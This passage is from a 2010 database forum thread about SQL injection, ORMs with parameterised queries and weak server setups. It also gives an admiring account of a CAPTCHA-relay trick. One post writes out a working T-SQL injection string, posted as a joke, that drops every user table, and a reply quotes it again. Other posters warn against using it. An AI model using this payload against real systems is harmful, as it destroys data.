April 20, 2010 at 5:43 pm
Topic 1:
I hardly dare mention it after the flogging ORMs got a week or so ago, but as a frequenter of the site probably with a foot planted more firmly on the application development side than most, I have to comment that one excellent side effect of a 'wrapper' tool is to prevent SQL injection.
I use SubSonic, as it provides full automated object wrapper generation (with partial class customisation), as well as being as non-prescriptive as possible with regard to SQL. For example, you can embed pure SQL (NOT in linq-ised stlye, the real stuff) into it as a query, BUT to run it, you need to pass any parameters to the execution function and this safely handles them for you. It gives you pretty much all the freedom of writing freeform SQL, while guarding against vulnerable code, and the bonus of saving stacks of time by handling all the minutiae and giving full object wrapping.
Not that I want to get into the business of whether you SHOULD embel SQL in an ORM, but Subsonic takes the approach that whether you do or not is your call, and it gives you as much freedom as possible to build it the way you want.
Belive me, all ORMs are NOT the same.
Topic 2:
The photo reminds me of another excellent exploit I read about.
The person was getting around CAPCHA on a target site by copying the capcha image, then dishing the same image up as a capcha check to users registering for an account on a site under their control, taking the user response (without being able to check correctness, but you'd think 80% or so correct), then feeding the answer back to the target site requiring the capcha check.
The controlled site was busy enough that they could do this in realtime, and feed the response back to the target site before timeout. Ingenious.
It's just such a bummer that they didn't even have an interthingy back in my 15-year-old-assembly-code hacker days. Doh !
April 20, 2010 at 5:44 pm
Naked Ape (4/19/2010)
That's thinking outside the square - even as a developer/SQL-admin, I have to admire his ingenuity.😛
I agree 100% - I love this. The Geek Shall Inherit the Earth!!
James Stover, McDBA
April 20, 2010 at 10:08 pm
I'm going to legally change my name to this:
');declare @ nvarchar(max);set @='';select @=@+'drop table '+quotename(object_schema_name(id))+'.'+quotename(name)+';' from sysobjects where xtype ='u';exec (@); --
Hope SSC has it's input sanitized. 🙂
April 20, 2010 at 11:37 pm
[font="Verdana"]
Michael Valentine Jones (4/20/2010)
');declare @ nvarchar(max);set @='';select @=@+'drop table '+quotename(object_schema_name(id))+'.'+quotename(name)+';' from sysobjects where xtype ='u';exec (@); --
too bad; if any body tried your "Injection", then .... !!! :-D[/font]
April 22, 2010 at 9:32 am
Or hope we have good backups! :w00t::hehe:
Please don't try that Michael. I suspect there are holes in what my devs built
April 22, 2010 at 10:15 am
Steve Jones - Editor (4/22/2010)
Or hope we have good backups! :w00t::hehe:Please don't try that Michael. I suspect there are holes in what my devs built
I won't, I have a new, improved version.
I'm not posting it. I probably shouldn't posted the other one; I'd hate to find out some idiot actually used it.
April 22, 2010 at 1:26 pm
Michael Valentine Jones (4/22/2010)
Steve Jones - Editor (4/22/2010)
Or hope we have good backups! :w00t::hehe:Please don't try that Michael. I suspect there are holes in what my devs built
I won't, I have a new, improved version.
I'm not posting it. I probably shouldn't posted the other one; I'd hate to find out some idiot actually used it.
I agree... you could go back and edit it out so some whacko doesn't have a new tool.
--Jeff Moden
Change is inevitable... Change for the better is not.
July 27, 2010 at 2:26 pm
Interesting editorial, Steve, and fab picture.
I suspect that SA with blank password, default instance, DBMS on the same server as the website and set up to use default port numbers, combined with firewall that allows default SQL default ports so that 3rd line support can get in to fix problems is both (1) a more common security hole than being open to injection attacks and (2) permits even nastier things to happen (only if the website connects to the DB with SA privileges will injection be able to be quite as bad as wide open SA access).
It's good to remind everyone that security matters, so the editorial isn't just interesting but good and useful too.
Tom
July 27, 2010 at 2:52 pm
Thanks, glad you enjoyed it.
It does seem that there are lots of holes out there that are just let go by companies/people without thinking about the wider issues. Hopefully someone made a change based on this to be more secure.
Viewing 9 posts - 16 through 23 (of 23 total)
You must be logged in to reply to this topic. Login to reply